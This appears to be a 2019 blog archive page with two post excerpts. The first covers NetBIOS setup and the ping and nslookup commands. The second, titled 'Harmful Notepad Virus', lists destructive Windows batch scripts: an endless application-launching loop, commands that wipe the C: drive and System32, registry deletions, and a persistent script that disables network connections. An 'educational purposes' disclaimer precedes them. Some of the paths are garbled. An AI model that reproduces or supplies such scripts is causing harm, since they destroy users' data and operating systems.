Posts

Showing posts from August, 2019

Amazing CMD Commands Used in Hacking

Image
Let's see how to Enable NetBIOS because we will have some fun with it. Open your Network Connection and right click and select Properties. Then Select TCP/IP and click Properties again. Now Click on Advanced and WINS tab . Select Default for NetBIOS. Now back to the main Local Area Connection window, select File and Print Sharing for Microsoft Networks and hit enter. 1.} PING : This command will allow you to check if the host you are pinging is alive, which means if it is up at the time of executing the “ping” command. ping x.x.x.x (x is the IP address). e.g. 8.8.8.8 which belongs to Google. or ping www.google.com (www.google.com is the website you want to ping, but you don’t know the IP). 2.} NSLOOKUP : This command has many functionalities. One is for resolving DNS into IP. Let's say you know the website URL, but you don’t know its IP, & you want to find it out. Eg. nslookup www.google.com (www.google.com is the website for which you want to find out the IP) anothe...

Harmful Notepad Virus

Image
Here are some of the Most Dangerous Viruses that can even Crash or Kill your PC. its only for Educational Purposes so don't even try it on any Person or not on your PC too. 1.} Application bomber(.bat): @echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x   2.} C drive cleaner(.bat): @Echo off Del C:\ *.* |y 3.} Delete Registry key(.bat): @echo off START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :message ECHO Your PC has been crashed. GOTO message 4.} Delete Windows system32(.bat): DEL C:\WINDOWS\SYSTEM32\*.*/Q 5.} Disable internet permanently(.bat): echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindo...